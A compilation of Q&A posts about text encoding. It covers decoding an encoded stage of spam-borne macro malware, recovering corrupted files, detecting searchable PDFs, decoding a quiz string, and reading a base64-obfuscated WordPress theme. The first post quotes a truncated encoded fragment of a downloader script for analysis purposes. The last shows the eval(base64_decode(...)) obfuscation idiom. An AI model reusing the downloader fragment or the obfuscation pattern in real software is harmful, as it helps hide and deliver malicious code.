text encoding & spam - text

Hi everybody.
Please help me fight my little personal war against spam/malware. I'm receiving spam with obviously fake attachments in the form of .doc bills or invoices.
These fake docs contain macro code that I'm able to decrypt using various tools. Generally such code tries to download an encrypted text file, which is actually further VBA code that, if executed, tries to download the real malware in the form of an EXE file.
The encrypted text file was usually a simple base64 encoded string.
Using normal base64 encoding/decoding tools was more than enough to decrypt the content and identify the IP address from which the malware tries to download the exe virus.
Recently things have changed. Now the encrypted text file contains what looks like base64 encoding, but apparently it is not.
The content is something like:
PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=
which resembles base64 encoding. But if you try and decode it using base64, you get something like:
<^#t^#e^#x^#t^#1^#0^#>^#$^#h^#y^#g^#q^#u^#d^#g^#a^#h^#s^#=^#'^#n^#u^#d^#q^#h^#w^#i^#u^#d^#h^#q^#w^#d^#q^#w^#'^#;^#
^#
^#$^#g^#f^#y^#w^#u^#g^#h^#a^#m^#s^#=^#'^#1^#2^#j^#h^#3^#g^#1^#2^#h^# ^#1^#2^#g^#3^#j^#h^#1^#2^#3^#1^#2^#3^#'^#;^#
^#
^#$^#d^#o^#w^#n^# ^#=^# ^#N^#e^#w^#-^#O^#b^#j^#e^#c^#t^# ^#S^#y^#s^#t^#e^#m^#.^#N^#e^#t^#.^#W^#e^#b^#C^#l^#i^#e^#n^#t^#;^#
instead of plain text (the VBS code that downloads the exe file).
Can anyone help me find the way to decode such dirt?
Thanks in advance!
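The `^#` that follows every character in the decoded output above looks like a NUL byte shown in caret notation. That is the pattern you get when base64-encoded UTF-16LE text is decoded and then viewed as single-byte text. A minimal sketch, assuming the payload really is base64 over UTF-16LE (the function name is made up for illustration; the sample is the first line quoted above):

```python
import base64


def decode_utf16_base64(payload: str) -> str:
    """Decode base64 and interpret the resulting bytes as UTF-16LE text.

    Assumption: the sender encoded the script as UTF-16LE before base64,
    which would explain the NUL byte after every ASCII character.
    """
    # Line breaks inside the payload are dropped before decoding.
    compact = "".join(payload.split())
    raw = base64.b64decode(compact)
    return raw.decode("utf-16-le")


# First line of the sample quoted in the question.
sample = "PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA"
print(decode_utf16_base64(sample))
```

If the byte count after base64 decoding is odd, the UTF-16 decode will raise an error, which would suggest a truncated payload or a different encoding.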

Related

python reverse unicode text into readable

I believe I have a similar problem to "how to convert unicode text to utf8 text readable?", but I want a Python 3.7 solution.
I am a complete newbie. I have some experience with Python, so I am trying to use it to write a script that will convert a Unicode file back into the readable text it was before.
The file is a bookmark file I recovered using easeusa. When I opened the bookmark file, it was written in Unicode, something like "&PŽ¾³kÊ
k-7ÄÜÅe–?XBdyÃ8߯r×»Êã¥bÏñ ¥»X§ÈÕÀ¬Zé‚1öÄEdýŽ‹€†.c"
whereas previously it said something like " "checksum": "112d56adbd0caa2b3693bb0442dd16ff",
"roots": {
"bookmark_bar": {
"children":"
FYI, when I click "Save As" for the Unicode bookmark file, the encoding shown is ANSI and not UTF-8, so maybe it was saved as ANSI. I might be waffling here, but I'm just trying to give you all the information you might need to help me.
I am a newbie who desperately needs help.
This text isn't "Unicode". It's simply gibberish.
This file has been corrupted -- it may have been overwritten with other data before you were able to recover it. It is unlikely to be recoverable.
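One way to check this for yourself is to test whether the recovered bytes still parse as the JSON the question shows. The sketch below is only an illustration: the function name is hypothetical, the "roots" key comes from the snippet in the question, and the `bad` bytes are an assumed Windows-1252 reading of the first few characters of the garbled sample.

```python
import json


def looks_like_bookmarks(data: bytes) -> bool:
    """Return True if the bytes parse as UTF-8 JSON with a "roots" object."""
    try:
        parsed = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        # Not valid UTF-8, or not valid JSON: not a usable bookmark file.
        return False
    return isinstance(parsed, dict) and isinstance(parsed.get("roots"), dict)


# Shape taken from the question; the empty children list is a placeholder.
good = b'{"checksum": "112d56adbd0caa2b3693bb0442dd16ff", "roots": {"bookmark_bar": {"children": []}}}'
# Assumed byte values for the start of the garbled sample.
bad = bytes([0x26, 0x50, 0x8E, 0xBE, 0xB3, 0x6B, 0xCA])

print(looks_like_bookmarks(good))
print(looks_like_bookmarks(bad))
```

If the check fails for the whole recovered file, no choice of text encoding will bring the bookmarks back.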

Corrupt Text File read/write/open

I have a large text file that I take notes in. Recently, after saving it, it won't open and gives the following error. I tried a few things from the web that didn't work: opening it in a different encoding, etc. Nothing worked. Any idea how I can open it again? Is there a language I can use from bash? I'm very familiar with PHP. Any ideas? A different text editor?
Error:
"The document “ToDo.txt” could not be opened. Text encoding Unicode (UTF-8) isn’t applicable."
"The file may have been saved using a different text encoding, or it may not be a text file."
cat the file from the CLI and make sure your data is still there. Then you could simply copy and paste the output into a new file and hopefully get rid of whatever weird encodings are causing that text editor to not read the file.
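If copying and pasting is impractical for a large file, a small script can do roughly the same thing. This is a sketch in Python rather than PHP, assuming the file is mostly UTF-8 with a few stray bytes; the function names and the sample bytes are made up for illustration.

```python
from typing import Optional


def first_bad_offset(raw: bytes) -> Optional[int]:
    """Return the offset of the first byte that is not valid UTF-8, or None."""
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError as err:
        return err.start
    return None


def salvage(raw: bytes) -> str:
    """Decode as UTF-8, replacing undecodable bytes with U+FFFD."""
    return raw.decode("utf-8", errors="replace")


# Made-up sample: two note lines with one invalid byte between them.
sample = b"buy milk\n" + b"\xff" + b"call Bob\n"
print(first_bad_offset(sample))
print(salvage(sample))
```

For the real file, the bytes could be read with `pathlib.Path("ToDo.txt").read_bytes()` and the salvaged text written to a new file, so the original stays untouched.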

Checking if PDF is searchable

I wrote a bash script that extracts plain text from scanned PDF files. I have lots of PDFs, but some are scanned and others are not. My main goal now is to improve the script by checking whether a PDF is already searchable, so that no OCR extraction is needed.
I've tried:
pdftotext -nopgbrk pdf_file.pdf wordlist
to store possible OCR'ed text in wordlist, so then I can check if it's empty and figure out whether it's a searchable PDF or not.
I've also tried pdffonts pdf_file.pdf to check whether the PDF contains any fonts, and therefore whether it contains text.
Both approaches work fairly well but fail in some cases.
For example, some of the PDFs I need to OCR are digitally signed, and those signatures always add a text layer to the PDF. So when I run either of those two commands, it outputs either the signature's text or the font it uses, as if it had found plain text just because of the signature. The file might be a scanned PDF with a digital signature, but it is detected as a plain-text PDF.
Digital signatures always add text this way (using the Helvetica font):
Signed by: Name
Date: Date CEST
Company: Company Name
So with:
pdftotext -nopgbrk pdf_file.pdf - | grep -v -E 'Signed|Date|Company'
I can manage to remove those lines so if it's really a scanned PDF, the output will be empty.
It worked for some PDFs until I noticed a signature with a different format, so I feel this is more of a workaround than a real solution.
Is there any way to check whether a PDF is fully searchable? I just need a way to extract a PDF's text while omitting digital signatures. Also, grep -v will always depend on the signature's format, and if that changes it will break my script.
Thanks.
Unfortunately, there really isn't an easy way to do this in a "non-hacky" way without significantly more involved analysis of the file which would be far beyond the scope and scale of a bash script.
When pdftotext outputs the text for the digital signature, that text is not coming from the digital signature itself. That is stored as an object in the PDF with metadata that pdftotext ignores. Instead, what pdftotext picks up is just that: text which has also been added to the file.
Here's an example from Adobe's sample signed PDF document. First, the digital signature's metadata:
And here is the text which is inserted into the document:
Technically, you can have one without the other, and there is no established format for the text that generally accompanies a digital signature. Therefore, you're stuck either:
Ignoring specific text with grep, as you are doing now, which can be unreliable.
Running OCR on all files and then checking if there is a difference in the text before/after OCR, but then this defeats the whole purpose of checking in the first place.
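The first option can be sketched as a small filter over text that pdftotext has already extracted. The patterns below come from the signature layout quoted in the question and are assumptions: a signature with a different layout will slip through, which is the unreliability described above. The function name and the sample strings are made up for illustration.

```python
import re

# Assumed patterns, based on the signature layout quoted in the question.
SIGNATURE_LINE = re.compile(r"^\s*(Signed by|Date|Company):")


def has_text_beyond_signature(extracted: str) -> bool:
    """Return True if any non-blank line is not a known signature line."""
    for line in extracted.splitlines():
        if line.strip() and not SIGNATURE_LINE.match(line):
            return True
    return False


# Made-up samples standing in for pdftotext output.
scanned_but_signed = "Signed by: Name\nDate: Date CEST\nCompany: Company Name\n"
searchable = "Invoice text\nTotal due: 100 EUR\n" + scanned_but_signed

print(has_text_beyond_signature(scanned_but_signed))
print(has_text_beyond_signature(searchable))
```

Anchoring the patterns to the start of the line and requiring the colon makes false matches on ordinary body text less likely than a bare `grep -v 'Date'`, but it does not remove the dependency on the signature format.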

How to decode this quiz code

I've just started learning about decoding, using a quiz site. I think the codes are base64, and I have tried decoding them on many decoder sites.
Ex: gPn8fA2pDJ9HApjA+Y9feV2RHTVv3l0BH6wDAH9CEh59vA5Q5RHT+UPOnHnwFn/R
How can I decode them to ABCD? If you decode it with a site, can you teach me how to use it? (The answer should only be A, B, C, or D, because this is a quiz site.)
Thank you very much!
I'd recommend using Notepad++ to encode/decode Base64 data.
It is quite simple. Just navigate to the menu Plugins -> MIME Tools. Before clicking the encode/decode options, make sure you have selected the data you want to encode or decode. In Notepad++ you can open any type of file, even executables, PDFs, etc., to use the Base64 capabilities.
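The same check can be scripted. The sketch below decodes the sample from the question and then tests whether the result is readable UTF-8 text; the function name is made up for illustration. For this particular sample the decoded bytes are not valid text, which suggests that base64 is at most the outer layer and some other encoding or encryption sits underneath.

```python
import base64
from typing import Optional, Tuple


def decode_base64(candidate: str) -> Tuple[bytes, Optional[str]]:
    """Decode base64; also return the bytes as UTF-8 text if they are valid."""
    # validate=True rejects characters outside the base64 alphabet.
    raw = base64.b64decode(candidate, validate=True)
    try:
        return raw, raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw, None


# Sample string from the question.
quiz_code = "gPn8fA2pDJ9HApjA+Y9feV2RHTVv3l0BH6wDAH9CEh59vA5Q5RHT+UPOnHnwFn/R"
raw, text = decode_base64(quiz_code)
print(len(raw), raw[:3].hex(), text)
```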

Decoding php code

I recently installed a WordPress theme on my site, and I am trying to remove the credit links from the footer and sidebar. The code is in an encrypted format, and the theme stops working properly if I try to remove the links. I tried decoding it with base64 converters, but that did not help.
Can any expert tell me what kind of encoding this is and how I can decode it?
Thanks in advance.
I have pasted the code here:
http://pastebin.com/ZLGRN9ey
It's encoded in base64 if you look at the end of the file.
eval(base64_decode($m));unset($m);
eval executes the PHP code. The code is first decoded with the base64_decode function, and afterwards the variable $m is removed with unset. If you want to see the decoded code, use echo base64_decode($m) instead. Even then, the result will likely still be obfuscated and hard to read. Try emailing the developer for the source.
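To inspect such a payload without executing it, the string can be decoded outside PHP. The sketch below rests on an assumption: that the theme file assigns a base64 string literal directly to $m. The pastebin content is not reproduced here, so the regular expression, the function name, and the demo source are hypothetical stand-ins.

```python
import base64
import re

# Hypothetical pattern: a quoted base64 string literal assigned to $m.
ASSIGNMENT = re.compile(r"""\$m\s*=\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*;""")


def reveal_payload(php_source: str) -> str:
    """Find the base64 literal assigned to $m and return it decoded."""
    match = ASSIGNMENT.search(php_source)
    if match is None:
        raise ValueError("no base64 string assigned to $m was found")
    # Drop any line breaks inside the literal before decoding.
    encoded = "".join(match.group(2).split())
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Made-up stand-in for the theme file, built so the example is self-contained.
hidden = base64.b64encode(b"<?php echo 'footer credits'; ?>").decode("ascii")
demo_source = f"$m = '{hidden}'; eval(base64_decode($m));unset($m);"

print(reveal_payload(demo_source))
```

If the decoded text contains another eval(base64_decode(...)) call, the same step can be repeated on that output. The code is only ever printed, never run.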
